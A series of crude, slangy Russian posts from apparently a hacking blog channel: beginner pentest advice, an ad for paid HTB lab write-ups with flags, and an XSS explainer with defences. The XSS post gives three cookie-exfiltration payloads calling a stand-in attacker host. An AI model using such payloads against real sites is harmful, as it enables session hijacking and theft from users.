Всем пр пиписчики

Сёдня с вами будем говорить а том, как вам ссут в ебало ))))

Вот наткнулся на такие мунуальчики за 10к каждый. Что в них написано? Правильно тут гайDICKи на метасплоит и импакет. О да естественно куча оняме картинок и фразочек типо вам никто такое не расскажет и это секретная инфа и тому подобное. 🌕

Вот всегда задавался вопросом почему если что то находится в даркнете, то ебланы готовы за это отдать всё что угодно, любой ценник, хоть 10к бачей. АХАХАХАХАХ вы представьте лица этих персонажей, когда они узнали, что есть OSCP, который в самой дорогой комплектации стоит гдет 5к бачей. (Ток инфы там раз в 10 больше и ещё ахуительный серт дают).

К чему я это всё? Думайте своей головой, иначе станете посмешищем и никакой инфы не получите. А автору респект, так филигранно драть обезьян, эт надо уметь😂

Сфинкс. Подписаться.

Йоу падписчики, щас вы меня будете хейтить и мне будет обидно (шучу мне похуй).

Короче, так как я коплю себе на машину, вводится платный товар. 🐈‍⬛

Скоро я напишу райтапы на несколько пролаб с хтб. В них будет описано буквально всё - флаги, как искать ту или иную уязвимость и описание её эксплуатации. Естесна после того, как ты введёшь все флаги, тебе так же дадут сертификат о прохождении (можешь им перед эйчаром понтануться). Все райтапы будут написаны таким же языком как на канале, так что не соскучишься🤩

Ориентировочная цена за райтап - 10к

Выйдут они примерно к концу января

ПЕНТЕСТ/ХАКИНГ С ЧЕГО НАЧАТЬ?

Всем пр, знаю пропал надолго. Ничего не могу с собой поделать. На меня напала какая то серьёзная апатия и посты делать не было никакого желания. Вообще полный 0, были силы только на пентест, чем я и занимался🤩

Сейчас я отвечу на самый частый и популярный вопрос у себя в лс и ирл. А с чего начать?😐 А как ты начинал?😐 Лол, все почему то ждут от меня волшебную пилюлю или гениальный курс/план/чеклист, который сделает из тебя имбового специалиста. Но такого нет. Блять, запомните нет волшебных пилюль, мы не в сказке, чтобы чему то научиться, придётся работать, а если ты хочешь достичь успеха в этом деле, то тебе придётся въёбывать 🔪)) С этим ты ничего не поделаешь, так устроен наш мозг.

Обычно, на вопрос с чего начать я справшиваю, а чем заниматься хочешь ты? 👀

🤖 Взломом сайтов?
🤖 Написанием вирусов?
🤖 Взломом инфры?
🤖 Ревёрсом?
🤖 Или вообще осинтом?
🤖 Чем блять ты хочешь заниматься?

После того, как ты ответил на этот вопрос, считай что половина уже сделана. Так как ты поставил цель. 🐕 Далее тебе надо составить роадмап того, что ты будешь изучать. Звучит страшно, на деле это легко (хотя зная человеческую натуру процентов 60 уже слилось на 1 вопросе ведь надо сидеть и выбирать, а не всё и сразу)😨 Итак, сейчас (о ужас) придётся снова думать, но я постараюсь тебе облегчить этот процесс. Как делаю я в таких ситуациях? Я просто нахожу несколько сливов курсов по данной тематике + требования в вакансиях на том же хабре/hh и составляю список тем для изучения☺️ Дальше дело за малым, тут уже думать не надо, тут ты просто ищешь инфу по всему интернету по этим темам, можешь кстати использовать те же курсы, по которым составлял список тем. Но я рекомендую статьи/доклады/видосы в гугле или на ютубе. Как бы парадоксально это не звучало на платных курсах зачастую инфа хуже чем в открытом доступе XD, а обычно ничем не отличается (на мои мануалы это распространяться не будет, там я буду учить тебя думать как пентестер)👍 Ну и всё, ты определился + роадмап составил + инфу нашёл. Самое время начать хуярить 🌅

Так ну гайд я тебе рассказал, (его можно кстати к любой сфере применить) теперь несколько нюансов🦍

🐈‍⬛ Начинай как можно раньше участвовать в ctf. Чем они сложнее, тем лучше. Если у тебя есть нереальная сила воли, пиздуй на хтб (как этим ресурсом пользоваться я объясню в одном из следующих постов). Старайся мусорных стфок, типо стф ради флага. Очень часто такое делают для студентов, чисто математическая задачка, которая ничему связанному с профессией тебя не научит. Запомни - эта лютая хуйня. Стф ты должен решать чтобы освоиться с линуксом и разными инструментами.

🐈‍⬛ Обязательно учи линукс, он нужен везде

🐈‍⬛ Избегай токсичного комьюнити. Кого я имею в виду? Те кто со мной много общается сразу поняли о ком я: это доксеры/сватеры/скамеры/темщики ну и прочие мутные ребята. Увы и ах, большинство из них с хакингом ничего общего не имеют. + могут тебя подсадить на "белую" темку из за которой ты окажешься на зоне)) это к сожалению огромная проблема, так как школота в силу гормонов запрыгивает в эту тусовку, а потом так и остаётся там.

🐈‍⬛ Учи английский, думаю без него на джуна ты дорастёшь, но выше джун+ ты без него не прыгнешь.

🐈‍⬛ Старайся как можно раньше попасть на стажировку. Похуй куда. Тебе нужен опыт, он тебя потом спасёт. (Хотя можешь его нарисовать себе, но без должных тех знаний тебя легко раскроют на собесе).

🐈‍⬛ Это самый главный совет. Как бы сильно тебя не ломала задача реши её во что бы то ни стало. Пока ты будешь искать ответ на неё ты не заметишь как узнаешь кучу нового из данной тематики, так как будешь пытаться копать в её суть. Если уж слишком сложно, бросай, но спустя время возвращайся. Следуй принципу - aut vincere, aut mori (либо победа, либо смерть)

Ну вот и усё что я хотел сказать, надеюсь подобных вопросов станет намного меньше. Желаю тебе удачи самурай🙂

Сфинкс. Подписаться.

Всем привет! Сегодня речь пойдёт о такой штуке как XSS. Давай сначала с тобой разберёмся что это такое. Это когда, злоумышленник в какое то поле для ввода, например в комы, пишет код, который уже исполняется на стороне пользователя. Например он переходит в комы и оп! 😂Кукисы его похищены. Этот пример будет продемонстрирован далее.

К сожалению многие не понимают, что значит "исполняется на стороне пользователя". Я объясню - это когда код исполняет не сервер какой-то, а само устройство юзера. Например его браузер исполняет js код, в котором есть этот "подарок" от злоумышленника и выдаёт пользовательские данные🕺

Теперь давай поговорим о видах XSS:

☠️ Reflected XSS - Это когда хакер "модифицирует" - какой то параметр в url. Например у нас есть сайт qwerty.org. в нём есть функция поиска слов в статьях, слово которое ищется передаётся в параметре search, по итогу там получается вот такая ссылка:

https://qwerty.org?search=something

Так что же межает атакеру написать туда не слово, а js код? Вот пример:

https://qwerty.org?search=<script>new Image().src='http://attackerserver.org/'+document.cookie</script>

Здесь его атакующему достаточно отправить ссыль человеку со словали "вау смотри что нашёл!" И когда он её откроет, то атакер получит на свой сервак его кукисы🍽

☠️ Stored XSS - на мой взгляб самый опасный вид XSS. Потому что он хранится на сайте, например какой то персонаж написал вредонос в комы и у каждого кто заходит на страничку с обсуждением, воруются куки и улетают хакеру. Для такого достаточно в комы написать это:

<script>new Image().src='http://attackerserver.org/'+document.cookie</script>

☠️ DOM XSS - тут уже XSS в самом document object model. Это когда мы в тегах через доп параметры начинаем исполнять JS код. Как пример есть такие штуки как onerror, onclick - именно туда хакер может и записать свой код.

Вот пример того, что может оказаться в комах:

<img src=x onerror='fetch("http://attackerserver.com/"+document.cookie)>

Когда ты понял что такое XSS, можем поговорить о защите от него:

🐈‍⬛ 1. Исключи любые штуки наподобие innerHTML, всё что позволяет пользователю свободно писать и редачить твою страницу

🐈‍⬛ 2. Введи жёсткие фильтры всего, что вводит пользователь

🐈‍⬛ 3. CSP - это такая штука, которая позволяет исполняться коду только из определённых мест.

🐈‍⬛ 4. Тестируй сам свой код на предмет XSS

🐈‍⬛ 5. Откажись от inline штук таких как onerror, onclick

🐈‍⬛ 6. Регулярно обновляй свои библиотеки и фреймворки.

🐈‍⬛ 7. Мониторь уязвимости. Можешь делать это по таким запросам: фреймворк_с_которыйм_ты_работаешь cve xss

🐈‍⬛ 8. Устанавливай HttpOnly, чтобы кукисы были недоступны через JS.

🐈‍⬛ 9. Используй различные фреймворки, они имеют встроенную защиту от xss

🐈‍⬛ 10. Регулярно обучайся сам, знания - главная сила

Думаю ты понял что это такое и как от этого защищаться 🤩

By Sphinx

Frontend Test & Tasks | #JS

ВИНДОВС ИЛИ ЛИНУКС?

Как же меня заебала вечная хрюканина на эту тему 😔

🦍 -Блять а йа юзаю линукс фу винда ну ты и пэдорас
🦍 -Нет эта ти лох на линукси сидишь ти вапще браузер 30 минут будишь устанавливать
🦍 -да пашёл ти нахуй йа фсо сам кастамизирую у миня вапще щас будит линукс как мак выглядет

Сидят главное такой хернёй маются. А теперь дорогой друг запомни: каждая операционка хороша для своих определённых целей. Если ты думаешь что линукс лучше винды или наоборот, то у меня для тебя плохие новости...🤔

Мне даже не хочется что то расписывать на эту тему, ибо это оч тупой вопрос, но люди подобным занимаются🦇, поэтому приведу несколько примеров: линукс оч хорош для веб серверов, взлома оптимизации ресурсов на слабых ноутов, а винда хороша например для выстраивания сети в организациях, на линухе хер ты чё там объединишь (ладно объединишь, но Active Directory будет дешевле, легче и функциональнее). Ах да, винду тоже можно потрясающе кастомизировать (чуууууудаааааа)😂

Поэтому, если у тебя в голове зародится идея кого то подъебать за операционку - то ты дурачок.😁 А если кто то на твоих глазах начинает что то доказывать, не вступай в спор. Просто сделай вывод, что человек мается хернёй. Таким всё равно ничего не докажешь. Сам поймёт, как подрастёт🤩

Сфинкс. Подписаться.